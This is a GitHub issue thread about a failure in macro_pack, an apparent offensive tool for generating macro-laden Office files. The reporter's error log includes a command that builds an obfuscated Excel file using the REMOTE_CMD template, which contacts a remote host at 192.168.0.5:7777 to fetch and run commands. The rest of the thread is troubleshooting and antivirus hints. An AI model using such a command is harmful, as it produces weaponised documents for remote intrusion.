### ISSUE TITLE
error

### ISSUE THREAD

**Issue by shtry** [sevagas/macro_pack#65]
Hi

Excel doesn't work.

only ms word work.

I have built the latest git source.

error log:
```
echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t REMOTE_CMD -o -G cmd.xlsm
 [!] Exception caught!
Traceback (most recent call last):
  File "excel_gen.py", line 137, in generate
  File "win32com\client\dynamic.py", line 181, in __call__
pywintypes.com_error: (-2147352567, ' 'VBAProject', , 'C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1042\\VbLR6.chm', 1000009, -2146828279), None)
 [!] Hints: Check if MS office is really closed and Antivirus did not catch the files
 [!] Attempt to force close MS Excel applications...
 [+] Cleaning...
 Done!

```

**Comment by sevagas** [comment]
Hi, I cannot reproduce the error. Are you sure this is not due to the antivirus catching the payload?

**Comment by sevagas** [comment]
No, answer, closing this

**Comment by Pragma-Edragon** [comment]
Same for me, not working 

No AV
